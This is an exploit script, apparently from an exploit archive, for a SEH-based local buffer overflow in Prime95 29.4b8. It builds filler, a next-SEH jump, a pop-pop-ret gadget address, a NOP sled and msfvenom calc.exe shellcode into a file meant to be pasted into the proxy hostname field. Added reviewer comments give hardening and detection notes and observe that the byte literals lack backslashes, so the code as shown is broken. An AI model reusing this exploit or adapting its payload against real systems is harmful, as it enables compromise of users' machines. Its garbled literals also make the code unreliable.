# Exploit Title: Prime95 Local Buffer Overflow (SEH)
# Date: 13-4-2018
# Exploit Author: crash_manucoot
# Contact: twitter.com/crash_manucoot
# Vendor Homepage: https://www.mersenne.org/
# Software Link: https://www.mersenne.org/download/#download
# Version: 29.4b8
# Tested on: Windows 10 Pro x64 (Spanish), Windows 7 Home Premium x86 (Spanish), Windows XP SP3 (Spanish)
# Category: Windows Local Exploit
# How to use: open the program go to test-PrimeNet-check the square-Connections paste the contents of open.txt in the optional proxy hostname field and the calculator will open

# Pieces of the proof-of-concept string, in the order they are concatenated
# later in this script: filler, next-SEH field, SEH handler field, padding.
# NOTE(review): as captured on this page these literals are plain ASCII text,
# so the script does not emit the byte values the comments describe.

# 660 filler characters; presumably the distance from the start of the
# proxy-hostname buffer to the SEH record -- the offset is the author's and
# cannot be confirmed from this file.
buffer = 660 * "A"

# Value placed in the next-SEH field of the overwritten record.
nseh = "xebx06x90x90"

# Value placed in the handler field. Author's gadget note:
#   pop esi # pop ebx # ret | {PAGE_EXECUTE_READ} [libgmp-10.dll]
#   ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0
# Defender's reading: the note reports a bundled DLL loaded at a fixed address
# without SafeSEH, which is what lets a hard-coded handler address work.
# Hardening: length-check the hostname field before copying, rebuild bundled
# modules with /DYNAMICBASE (and /SAFESEH where the toolchain supports it),
# and keep SEHOP enabled on the host.
seh = "x6BxB0xEDx6A"

# Sixteen repetitions of the padding token placed ahead of the payload.
nop = 16 * "x90"

# Payload blob, built up as one string by repeated concatenation.
# Per the author's generator command below it is a proof-of-execution payload
# that starts calc.exe; it is an opaque encoded blob and is left untouched.
# Detection note: the Prime95 process spawning calc.exe (or any other child
# process) after the PrimeNet connection dialog is edited is anomalous and is
# a reasonable process-creation alert for this class of bug.
#msfvenom -p windows/exec CMD=calc.exe -b "x00" -f python -v shellcode
shellcode = ""
shellcode += "xbfxc6xdex94x3exdaxd0xd9x74x24xf4x5d"
shellcode += "x31xc9xb1x31x31x7dx13x03x7dx13x83xc5"
shellcode += "xc2x3cx61xc2x22x42x8ax3bxb2x23x02xde"
shellcode += "x83x63x70xaaxb3x53xf2xfex3fx1fx56xeb"
shellcode += "xb4x6dx7fx1cx7dxdbx59x13x7ex70x99x32"
shellcode += "xfcx8bxcex94x3dx44x03xd4x7axb9xeex84"
shellcode += "xd3xb5x5dx39x50x83x5dxb2x2ax05xe6x27"
shellcode += "xfax24xc7xf9x71x7fxc7xf8x56x0bx4exe3"
shellcode += "xbbx36x18x98x0fxccx9bx48x5ex2dx37xb5"
shellcode += "x6fxdcx49xf1x57x3fx3cx0bxa4xc2x47xc8"
shellcode += "xd7x18xcdxcbx7fxeax75x30x7ex3fxe3xb3"
shellcode += "x8cxf4x67x9bx90x0bxabx97xacx80x4ax78"
shellcode += "x25xd2x68x5cx6ex80x11xc5xcax67x2dx15"
shellcode += "xb5xd8x8bx5dx5bx0cxa6x3fx31xd3x34x3a"
shellcode += "x77xd3x46x45x27xbcx77xcexa8xbbx87x05"
shellcode += "x8dx34xc2x04xa7xdcx8bxdcxfax80x2bx0b"
shellcode += "x38xbdxafxbexc0x3axafxcaxc5x07x77x26"
shellcode += "xb7x18x12x48x64x18x37x2bxebx8axdbx82"
shellcode += "x8ex2ax79xdb"

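# Join the pieces in a fixed order: filler, next-SEH value, handler value,
# padding, payload.
evil = buffer + nseh + seh + nop + shellcode

# Write the test string to open.txt in the current working directory; the file
# header says its contents are pasted into the optional proxy hostname field.
# The context manager closes the handle even if write() raises, and the name
# `out` avoids shadowing the Python 2 builtin `file`.
with open('open.txt', 'w+') as out:
    out.write(evil)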